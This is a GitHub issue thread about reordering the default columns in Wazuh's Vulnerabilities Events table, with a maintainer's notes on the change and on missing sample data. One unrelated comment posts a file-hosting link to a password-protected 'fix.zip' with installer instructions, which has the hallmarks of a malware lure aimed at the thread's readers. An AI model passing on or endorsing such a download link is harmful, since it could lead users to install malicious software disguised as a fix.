### ISSUE TITLE
Change default columns in vulnerabilities events

### ISSUE THREAD

**Issue by asteriscos** [wazuh/wazuh-dashboard-plugins#6947]
| Wazuh | Rev  | Browser                      |
|-------|------|------------------------------|
| 4.9.0 | - | Chrome, Firefox, Safari, etc |

**Description**
We need to change the default columns displayed in the Vulnerabilities modules -> Events table to:

| timestamp | agent.name | data.vulnerability.cve | data.vulnerability.severity | data.vulnerability.package.name | data.vulnerability.package.version | data.vulnerability.status |
|---------------|----------|------|-----------|----------------------|------------------------|---------|

Code reference:
https://github.com/wazuh/wazuh-dashboard-plugins/blame/v4.9.0-rc1/plugins/main/public/components/overview/vulnerabilities/events/vulnerabilities-columns.tsx

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Desvelao** [comment]
# Changes

I changed the order of columns as specified.

When I tried to check the change in the UI, I added sample data and I did not see the `data.vulnerability.status`` column displayed. I found the sample data does not include this field.

I wanted to see the alerts related to vulnerabilities and deploying an environment with 4.9.0 I could not get alerts despite I had vulnerability inventory. I reviewed the alerts on a deploy of 4.8.2 and take a example for the field `data.vulnerability.status`.

I will add this field to the sample data of Vulnerabilities and this lets the `data.vulnerability.status` column can be renderd on Vulnerability Detection > Events table.

**Comment by Desvelao** [comment]
The issue was moved to 4.9.0 so it needed to open a new pull request that contains the changes.
